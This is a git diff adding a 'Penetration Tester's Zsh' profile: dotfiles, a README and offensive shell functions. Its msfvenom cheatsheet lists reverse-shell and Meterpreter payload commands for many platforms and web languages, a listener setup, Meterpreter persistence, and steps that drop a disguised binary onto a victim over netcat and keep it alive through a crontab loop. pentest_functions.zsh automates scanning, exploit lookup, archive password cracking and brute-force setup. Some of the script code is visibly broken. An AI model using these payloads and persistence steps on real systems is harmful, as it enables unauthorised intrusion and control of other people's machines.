diff --git a/.README.md.un~ b/.README.md.un~ new file mode 100755 index 0000000..2827690 Binary files /dev/null and b/.README.md.un~ differ diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 447769d..7e6fcef --- a/README.md +++ b/README.md @@ -1 +1,43 @@ Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn n0nexi-stent.com + Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/README.md~ b/README.md~ new file mode 100755 index 0000000..65aaaac --- /dev/null +++ b/README.md~ @@ -0,0 +1,43 @@ +Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn 127.0.0.1 + Example for multiple targets: autopawn "127.0.0.1 127.0.0.2" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/profile_files/.nanorc b/profile_files/.nanorc new file mode 100644 index 0000000..be95edc --- /dev/null +++ b/profile_files/.nanorc @@ -0,0 +1,6 @@ +set linenumbers +set brackets ""')>]}" +set matchbrackets "(<[{)>]}" +set nohelp +set mouse +set smooth diff --git a/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt new file mode 100644 index 0000000..95c6d72 --- /dev/null +++ b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt @@ -0,0 +1,126 @@ +C0nn3ctz msfvenom payload backdoor veil + +List payloads +msfvenom -l + +# The script way to make life more simple +theip=0.0.0.0 +theport=443 + + +Binaries and libs +================= + +Linux +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf +msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf + +Windows +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf +msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED +msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport + +Mac +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho + + + +Web Payloads +============ + +PHP +msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php + +ASP +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp + +JSP +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp + +WAR +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war + +JavaScript +msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le + + + +Scripting Payloads +================== + +Python +msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py + +Bash +msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh + +Perl +msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux +msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows + + + +Shellcode +========= + +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. + +Linux Based Shellcode +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f + +Windows Based Shellcode +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f +msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c +msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small + +Mac Based Shellcode +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f + + + +Handler +======= + +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. + +use exploit/multi/handler +set PAYLOAD cmd/windows/powershell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 443 +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + + + +Persistence +=========== +meterpreter > run persistence + + + +UUID Payload +============ + +# Create payload +msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat + +# Setup msf listener +set payload linux/x86/meterpreter/reverse_tcp_uuid +set payloadUUIDName HAXHAXHAXHAX +set PayloadUUIDTracking true +run -j  + +# Move to vict +cat hipchat.elf |ncat --ssl -lvp 53 +nc --ssl domainzz.com 53 > /sbin/lister +chmod +x /sbin/lister + +# crontab alternatively: +if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi + diff --git a/profile_files/.ptz/v3das/network_sniffing_wireshark.txt b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt new file mode 100644 index 0000000..006832d --- /dev/null +++ b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt @@ -0,0 +1,37 @@ +C0nn3ctz sniffing wireshark network + +IP address +ip.addr == 192.168.1.1 +ip.src == 192.168.1.1 +ip.dst == 192.168.1.1 + +Show only tcp port 110 +tcp.port eq 110 + +Show only tcp and udp port 110 +tcp.port eq 110 || udp.port eq 110 + +Follow TCP stream +tcp.stream eq 0 + +Show only TCP +tcp + +Show only ARP +arp + +Show only HTTP +http + +Show only HTTP or ARP +http||arp + + +HTTP and ip.src +http&&ip.src==192.168.1.4 + +HTTP POST +http:.request.method == "POST" + +etc +(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4) diff --git a/profile_files/.vimrc b/profile_files/.vimrc new file mode 100644 index 0000000..afdae4e --- /dev/null +++ b/profile_files/.vimrc @@ -0,0 +1,4 @@ +syntax on +set nu +set backspace=indent,eol,start +set tabstop=4 shiftwidth=4 expandtab diff --git a/profile_files/.zsh/.pentest_functions.zsh.swp b/profile_files/.zsh/.pentest_functions.zsh.swp new file mode 100644 index 0000000..a5402f9 Binary files /dev/null and b/profile_files/.zsh/.pentest_functions.zsh.swp differ diff --git a/profile_files/.zsh/agro_detection_parser.py b/profile_files/.zsh/agro_detection_parser.py new file mode 100644 index 0000000..021424d --- /dev/null +++ b/profile_files/.zsh/agro_detection_parser.py @@ -0,0 +1,10 @@ +#!/usr/bin/python2.7 + +with open('2_ports_and_service_top1000_on_alive_hosts.out') as f: + curip="" + for curline in f: + if "Nmap scan report for " in curline: + curip=curline + curip=curip[21:] + if "open" in curline: + print curip.strip('\n') + " " + curline.strip('\n') diff --git a/profile_files/.zsh/aliases.zsh b/profile_files/.zsh/aliases.zsh new file mode 100644 index 0000000..a0dd0e2 --- /dev/null +++ b/profile_files/.zsh/aliases.zsh @@ -0,0 +1,2 @@ +alias py='python' +alias pl='perl' diff --git a/profile_files/.zsh/bindkeys.zsh b/profile_files/.zsh/bindkeys.zsh new file mode 100644 index 0000000..3069983 --- /dev/null +++ b/profile_files/.zsh/bindkeys.zsh @@ -0,0 +1,13 @@ +bindkey "^K" kill-whole-line + +bindkey "${terminfo[khome]}" beginning-of-line +bindkey "${terminfo[kend]}" end-of-line +bindkey "\e[3~" delete-char + +bindkey -v +bindkey '^R' history-incremental-search-backward +bindkey '^T' history-incremental-search-backward + +# Jumping with ctrl+arrows +bindkey "^[[1;5C" forward-word +bindkey "^[[1;5D" backward-word diff --git a/profile_files/.zsh/colors.zsh b/profile_files/.zsh/colors.zsh new file mode 100644 index 0000000..8267050 --- /dev/null +++ b/profile_files/.zsh/colors.zsh @@ -0,0 +1,17 @@ +autoload colors; colors + +# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space. +for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do + eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}' + eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}' +done + +eval RESET='$reset_color' +export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK +export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE +export PR_BOLD_WHITE PR_BOLD_BLACK + +# Clear LSCOLORS +unset LSCOLORS +export CLICOLOR=1 +export LS_COLORS=exfxcxdxbxegedabagacad diff --git a/profile_files/.zsh/completion.zsh b/profile_files/.zsh/completion.zsh new file mode 100644 index 0000000..6fe6d5f --- /dev/null +++ b/profile_files/.zsh/completion.zsh @@ -0,0 +1,2 @@ +autoload -U compinit && compinit +zmodload -i zsh/complist diff --git a/profile_files/.zsh/general_functions.zsh b/profile_files/.zsh/general_functions.zsh new file mode 100644 index 0000000..febd4bd --- /dev/null +++ b/profile_files/.zsh/general_functions.zsh @@ -0,0 +1,22 @@ +function extract { + echo Running extract on $1 ... + if [ -f $1 ] ; then + case $1 in + *.tar.bz2) tar xjf $1 ;; + *.tar.gz) tar xzf $1 ;; + *.bz2) bunzip2 $1 ;; + *.rar) unrar x $1 ;; + *.gz) gunzip $1 ;; + *.tar) tar xf $1 ;; + *.tbz2) tar xjf $1 ;; + *.tgz) tar xzf $1 ;; + *.zip) unzip $1 ;; + *.Z) uncompress $1 ;; + *.7z) 7z x $1 ;; + *.xz) unxz $1 ;; + *) echo "'$1' cannot be extracted via extract()" ;; + esac + else + echo "'$1' is not a valid file" + fi +} diff --git a/profile_files/.zsh/history.zsh b/profile_files/.zsh/history.zsh new file mode 100644 index 0000000..1e38ca6 --- /dev/null +++ b/profile_files/.zsh/history.zsh @@ -0,0 +1 @@ +# Not saving history by default diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh new file mode 100644 index 0000000..86f549d --- /dev/null +++ b/profile_files/.zsh/pentest_functions.zsh @@ -0,0 +1,200 @@ +function everythingworksornot"?" { + echo "really?" +} + +function ton { + . torsocks on +} + +function tof { + . torsocks off +} + + +function chkhttpz { + echo "HTTP responses" + wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" + + echo "\nHTTPS responses" + wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" +} + + +function chkcrt { + openssl s_client -showcerts -connect $1:$2 +} + + +function hlp { + echo "You can get help from the following topics:" + for f in ~/.ptz/v3das/* ; do + echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 + done +} + +function hlprnd { + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo; +} + + +function johnzip { + if [ $# -ne 2 ] + then + echo "Usage $0 " + return + fi + + echo "Unzip test..." + unzip -l $1 + + echo "Cracking...." + for i in $(john --wordlist=$2 --rules --stdout) + do + echo -ne "\rtrying \"$i\" " + unzip -o -P $i $1 >/dev/null 2>&1 + STATUS=$? + if [ $STATUS -eq 0 ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done +} + + +function johnrar { + if [ $# -ne 2 ] + then + echo "Usage $0 " + else + rar l $1 + echo "Cracking...." + john --wordlist=$2 --rules --stdout | while read i + do + echo -ne "\rtrying \"$i\" " + rar e -o+ -inul -p$i $1 >/dev/null + STATUS=$? + if [ $STATUS -eq "0" ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done + fi +} + + + +function pawnpls { + amir00t=$(whoami) + if [ "$amir00t" != "root" ] + then + echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)." + return + fi + + if [ $# -ne 1 ] + then + echo "Are you sure? You need to specify a target. Be careful. This runs out of tor also, even if you have torsocks ;)" + return + fi + + # Pass to the scan function, no active attacks, just scanning + pawnpls_tof_target=$1 + dns_enum_tof + scan_enum_tof + active_attack_tof + +} + + +function dns_enum_tof { + + . torsocks off + + dnstarg=($pawnpls_tof_target) + + cdate=$(date +"%Y-%m-%d-%H%M") + dettmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt + +} + +function scan_enum_tof { + + . torsocks off + + # Variables + targetx=($pawnpls_tof_target) # Space delimited! + ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + + # Initialize directory and naming structure + cdate=$(date +"%Y-%m-%d-%H%M") + sctmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + touch scan_history.txt + + echo "---- Starting AgroScanner ----" >> scan_history.txt + + # Start with standard alive scan and check ports on alive hosts + # Get alive hosts + echo "Starting alive host enumeration..." + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt + nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out + alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + + echo "Starting port scans on alive hosts..." + # Port scanning on alive hosts and version detection + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt + nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out + python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out + number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + # Run UDP scan on most common ports + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt + nmap -sU --top-ports 50 $targetx > 4_udpscan.out + number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + + echo "Starting nmap nse vulnerability scanning..." + # Vulnerability scanning + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt + nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt + nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something + nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt + # for searchsploit, but nmap should be configured to scan with xml, default is top 1000 + nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit + searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. Outputs are in the relevant files." >> scan_history.txt + +} + +function active_attack_tof { + + . torsocks off + + cdate=$(date +"%Y-%m-%d-%H%M") + aatmpfold="~/.ptz/result-attack-$cdate" + mkdir -p $aatmpfold + cd $aatmpfold + + + # Preconfs + hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd) + usernames="/usr/share/nmap/nselib/data/usernames.lst" + passwords="/usr/share/nmap/nselib/data/passwords.lst" + + + + +} diff --git a/profile_files/.zsh/prompt.zsh b/profile_files/.zsh/prompt.zsh new file mode 100644 index 0000000..fc35679 --- /dev/null +++ b/profile_files/.zsh/prompt.zsh @@ -0,0 +1,37 @@ +function git_prompt_info { + local ref=$(=git symbolic-ref HEAD 2> /dev/null) + local gitst="$(=git status 2> /dev/null)" + + if [[ -f .git/MERGE_HEAD ]]; then + if [[ ${gitst} =~ "unmerged" ]]; then + gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}" + else + gitstatus=" %{$fg[green]%}merged%{$reset_color%}" + fi + elif [[ ${gitst} =~ "Changes to be committed" ]]; then + gitstatus=" %{$fg[blue]%}!%{$reset_color%}" + elif [[ ${gitst} =~ "use \"git add" ]]; then + gitstatus=" %{$fg[red]%}!%{$reset_color%}" + elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then + gitstatus=" %{$fg[yellow]%}*%{$reset_color%}" + else + gitstatus='' + fi + + if [[ -n $ref ]]; then + echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus" + fi +} + +function trso { + trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so) + if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]] + then + trchkres="%{$fg[yellow]%}tof" + else + trchkres="%{$fg[red]%}ton" + fi + echo $trchkres +} + +PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' diff --git a/profile_files/.zsh/setopt.zsh b/profile_files/.zsh/setopt.zsh new file mode 100644 index 0000000..4b865a7 --- /dev/null +++ b/profile_files/.zsh/setopt.zsh @@ -0,0 +1,4 @@ +setopt AUTO_CD +setopt COMPLETE_IN_WORD +setopt ALWAYS_TO_END +setopt PROMPT_SUBST diff --git a/profile_files/.zshrc b/profile_files/.zshrc new file mode 100644 index 0000000..45b0ff2 --- /dev/null +++ b/profile_files/.zshrc @@ -0,0 +1,14 @@ +source ~/.zsh/colors.zsh +source ~/.zsh/setopt.zsh +source ~/.zsh/prompt.zsh +source ~/.zsh/completion.zsh +source ~/.zsh/aliases.zsh +source ~/.zsh/bindkeys.zsh +source ~/.zsh/functions.zsh +source ~/.zsh/general_functions.zsh +source ~/.zsh/pentest_functions.zsh +source ~/.zsh/history.zsh + +zstyle ':completion:*' menu select + +. torsocks on